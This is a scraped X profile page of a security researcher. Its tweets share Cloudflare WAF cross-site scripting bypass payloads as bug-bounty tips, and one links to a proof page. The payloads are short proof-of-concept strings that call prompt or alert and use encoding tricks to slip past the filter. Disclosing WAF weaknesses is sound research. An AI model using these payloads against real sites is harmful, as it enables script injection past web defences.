Anton Korzhynskyi
@tohasec
Security researcher from lovely Ukraine 💙💛
You might like
New Cloudflare XSS Bypass: <svg/OnLoad="`${prompt``}`"> Proof: waf.cumulusfire.net/xss?globalHtml… A strange new solution from Cloudflare engineers. WAF will be weakened if DOM event has uppercase. #WAF #XSS #BugBounty #BugBountyTip
Шановні @the_prozorro та @HackenProof! Я та @page_1337 хочемо передати винагороду за найдені вразливості на #hackprozorro відразу на благодійність дітям, наприклад через blago.privatbank.ua Що для цього потрібно?
My turn :) Cloudflare #XSS #Bypass <img src onerror=%26emsp;prompt`${document.domain}`> #WAF #BugBounty #BugBountyTip
Cloudflare #XSS #Bypass via dot 1'"><img/src/onerror=.1|alert``> #WAF #BugBounty #BugBountyTip
Another #Cloudflare #XSS #Bypass xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'> #WAF #BugBounty #BugBountyTip
Cloudflare XSS Bypass via add 8 or more superfluous leading zeros for dec and 7 or more for hex. Dec: <svg onload=prompt%26%230000000040document.domain)> Hex: <svg onload=prompt%26%23x000000028;document.domain)> #Bypass #WAF #XSS #Cloudflare #BugBountyTip
United States Trends
- 1. #StrangerThings5 68.5K posts
- 2. Thanksgiving 573K posts
- 3. Afghan 179K posts
- 4. #AEWDynamite 18.5K posts
- 5. National Guard 530K posts
- 6. #Survivor49 2,471 posts
- 7. holly 29.8K posts
- 8. Kevin Knight 2,226 posts
- 9. Rahmanullah Lakanwal 72K posts
- 10. dustin 83.3K posts
- 11. Chet 4,920 posts
- 12. Cease 27.8K posts
- 13. Doris Burke N/A
- 14. robin 49.8K posts
- 15. Gobert 1,824 posts
- 16. Rizo 2,163 posts
- 17. Wolves 16.6K posts
- 18. Tini 5,355 posts
- 19. Blood 260K posts
- 20. #SistasOnBET 1,232 posts
You might like
-
Walid Hossain
@walidhossain_ -
Youssef Sammouda (sam0)
@samm0uda -
💫
@umr4n6 -
Bogdan Bodisteanu
@xalerafera -
Alex Birsan
@alxbrsn -
Fisher
@Regala_ -
Rudra Sarkar
@rudr4_sarkar -
Wolfdroid
@ShMalav -
Imran Parray
@imranparray101 -
Harshad Gaikwad
@H4rSh4D -
Sharan Panegav
@PanegavSharan -
Saqib Chand 🇵🇸
@sakyb7 -
Vijith Vellora
@vijithvellora -
(((gamliel)))
@Gamliel_InfoSec -
Mohamed Haron
@m7mdharon
Something went wrong.
Something went wrong.